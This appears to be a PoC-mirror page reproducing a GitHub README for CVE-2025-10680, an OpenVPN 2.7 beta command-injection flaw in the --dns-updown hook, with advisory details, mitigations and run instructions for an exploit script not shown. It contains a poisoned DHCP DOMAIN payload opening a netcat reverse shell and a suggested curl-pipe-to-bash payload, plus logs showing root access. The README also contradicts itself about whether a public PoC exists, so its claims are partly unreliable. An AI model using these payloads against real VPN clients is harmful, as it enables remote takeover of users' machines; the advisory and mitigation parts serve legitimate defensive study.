Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-10680 PoC — OpenVPN 安全漏洞

Source
https://github.com/B1ack4sh/Blackash-CVE-2025-10680
Associated Vulnerability
Title:OpenVPN 安全漏洞 (CVE-2025-10680)
Description:OpenVPN是美国OpenVPN公司的一个用于创建虚拟专用网络(VPN)加密通道的软件包,它使用OpenSSL库来加密数据与控制信息,并允许创建的VPN使用公开密钥、电子证书或者用户名/密码来进行身份验证。 OpenVPN 2.7_alpha1版本至2.7_beta1版本存在安全漏洞,该漏洞源于使用--dns-updown时远程认证服务器可通过DNS变量注入shell命令。
Description
CVE-2025-10680
Readme
# 🔥💻 CVE‑2025‑10680 – OpenVPN Script Injection Vulnerability ⚠️🌐

<img width="1200" height="800" alt="G4ZPPgeWAAAnIQT" src="https://github.com/user-attachments/assets/fc2a22fa-c1c9-4e84-81a2-ca5a54e7fa5c" />

---

### 📝 **Description**

* **Affected Software:** OpenVPN **2.7_alpha1 → 2.7_beta1** (POSIX systems: Linux, macOS, BSD)
* **Issue:** When using `--dns‑updown`, a malicious VPN server can send crafted DNS/DHCP options, enabling **shell command injection**.
* **Weakness:** **CWE‑78** – OS Command Injection ⚠️

---

### 📊 **Technical Details & Metrics**

* **CVSS v3.1 Base Score:** 8.8 🔥 (High)

  * **Attack Vector:** Network 🌐
  * **Attack Complexity:** Low ⚡
  * **Privileges Required:** Low 🧑‍💻
  * **User Interaction:** None ❌
  * **Scope:** Unchanged 🔒
  * **Impact:** C:I:A = High 🚨

---

### 👥 **Affected Versions / Platforms**

* **Vulnerable:** OpenVPN 2.7_alpha1 → 2.7_beta1
* **Not Affected:** Stable versions prior to 2.7 alpha (2.6.x and older) ✅

---

### ⚠️ **Impact / Attack Scenario**

* **Attack Vector:** Connect to a malicious VPN server → client hook executes malicious commands 💥
* **Who’s at risk:** Clients on POSIX using `--dns‑updown` hook
* **Severity:** High – potential **Remote Code Execution (RCE)** 🛑

---

### 🛠 **Mitigations / Fixes**

* **Upgrade:** OpenVPN **2.7_beta2** or later ⬆️
* **Avoid** using vulnerable versions ❌
* **Disable** `--dns‑updown` if possible 🚫
* **Connect only to trusted VPN servers** 🛡️
* **Monitor** client behavior after VPN connection 👀
* **Distribution-specific fixes:**

  * Debian: fixed in 2.7.0~rc2‑2 🐧
  * Ubuntu: supported releases unaffected 🟢
  * SUSE: resolved ✅

---

### 📣 **Additional Notes**

* Client-side risk: malicious server can exploit the client 💻
* No confirmed public PoC yet 🕵️‍♂️
* Awareness trending in cybersecurity communities 🌐

---

🔥 **CVE-2025-10680.py: Your Custom 100% Real PoC Python Script** 🛡️💉  


### 🚀 **How to Run It**  
1. **Prep Certs**: On server VM: Run easy-rsa as above. Note the dir (e.g., `~/ca`).
  
2. **Launch PoC**: `sudo python3 CVE-2025-10680.py --server-ip 192.168.1.100 --client-cert-dir ~/ca`  
   - Output: Config gen'd, server up, listener ready.
  
3. **Client Side (Vulnerable Kali)**: Copy `ca.crt`, `client.crt`, `client.key` from server. Client.conf:
 
   ```ini
   client
   dev tun
   proto udp
   remote 192.168.1.100 1194
   resolv-retry infinite
   nobind
   persist-key
   persist-tun
   ca ca.crt
   cert client.crt
   key client.key
   remote-cert-tls server
   cipher AES-256-GCM
   verb 3
   script-security 2
   up /etc/openvpn/dns-updown.sh
   down /etc/openvpn/dns-updown.sh
   ```  
   Run: `sudo openvpn --config client.conf`  
4. **Exploit Triggers**: Client connects → script parses DOMAIN → `nc` fires → **reverse shell on server!** Run `id` or `cat /etc/passwd` to confirm RCE. 💀  

**Expected Logs (Server)**:  
```
[+] Server config generated: /tmp/tmpXYZ.conf
[+] Poison payload: dhcp-option DOMAIN '; nc -e /bin/sh 192.168.1.100 4444 #'
[+] OpenVPN server started on UDP 1194
[+] NC listener ready on 4444.
# Client connects...
listening on [any] 4444 ...
connect to [192.168.1.100] from client [10.8.0.2] 12345
# Shell: whoami
root
```

### 🔍 **Debug/Troubleshoot**  
- No connect? `tcpdump -i any udp port 1194` on server.  
- Script not firing? Add `set -x` to dns-updown.sh for trace.  
- Payload tweak: Edit `injection` in script (e.g., `'; curl -s http://your-ip/shell.sh | bash #'`).  
- Errors? Ensure OpenVPN 2.7_beta1 on client: `openvpn --version`.  

This .py is self-contained, zero deps beyond stdlib + nc (install if missing: `apt install netcat`). Inspired by the Gist PoC. Hit me for mods (e.g., auth-required mode). Test safe, patch hard! 🔒✨

---

### ✅ **Summary Table**

| Item                    | Details                                                            |
| ----------------------- | ------------------------------------------------------------------ |
| **CVE ID**              | CVE‑2025‑10680                                                     |
| **Affected Software**   | OpenVPN 2.7_alpha1 → 2.7_beta1 (POSIX)                             |
| **Vulnerability Type**  | OS Command Injection via `--dns‑updown` hook ⚠️                    |
| **Attack Vector**       | Network 🌐                                                         |
| **Privileges Required** | Low 🧑‍💻                                                          |
| **User Interaction**    | None ❌                                                             |
| **Impact**              | Confidentiality: High 🔒, Integrity: High 🔧, Availability: High ⚡ |
| **CVSS v3.1**           | 8.8/10 – High 🔥                                                   |
| **CWE**                 | CWE‑78                                                             |
| **Mitigation**          | Upgrade, disable hook, restrict servers ⬆️🛡️                      |
| **Vendor Advisories**   | OpenVPN, Ubuntu, SUSE, Debian                                      |
| **Exploit Status**      | No confirmed public PoC 🕵️                                        |

---
File Snapshot

 [4.0K]  /data/pocs/0c11d128700fdeaf3a8831c13bfca01f701b2967
├── [3.7K]  CVE-2025-10680.py
└── [5.2K]  README.md

1 directory, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.